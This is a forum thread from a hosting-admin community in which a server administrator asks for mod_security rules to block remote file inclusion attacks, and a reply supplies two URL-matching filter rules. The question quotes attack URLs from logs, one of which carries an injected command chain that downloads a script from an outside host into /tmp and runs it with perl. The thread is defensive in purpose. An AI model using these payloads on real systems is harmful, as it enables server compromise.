The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Mod_security Rule Assistance - Prevent SPAM

Discussion in 'Security' started by Sash, Apr 24, 2007.

  1. Sash

    Sash Well-Known Member

    Joined:
    Feb 18, 2003
    Messages:
    252
    Likes Received:
    0
    Trophy Points:
    16
    Hello,

    Does anyone have a mod_security rule that will block these types of exploits.....?

    http://www.domain.com/index.php?d=http://att4ck3d.xpg.com.br/cmd.txt?&action=cmd&chdir=/tmp

    http://www.domain.com/index.php?d=http://teampcc10.ooblez.com/tool25.txt?&cmd=cd%20/tmp%20;%20killall%20-9%20perl%20;%20killall%20-9%20perl5.8.8%20;%20wget%20http://teampcc10.ooblez.com/sess_0101.txt%20;%20lynx%20http://teampcc10.ooblez.com/sess_0101.txt%20;%20curl%20-o%20sess_0101.txt%20http://teampcc10.ooblez.com/sess_0101.txt%20;%20perl%20sess_0101.txt

    A rule that would prevent people from loading a file from an external URL would be great.

    Thanks,
    MIke
     
  2. Angel78

    Angel78 Well-Known Member

    Joined:
    May 9, 2002
    Messages:
    413
    Likes Received:
    1
    Trophy Points:
    16
    SecFilterSelective REQUEST_URI "index.php\?id=(http|ftp|https)\:/"
    SecFilterSelective REQUEST_URI "=(http|ftp|ftps|https)\:/"
     
Loading...

Share This Page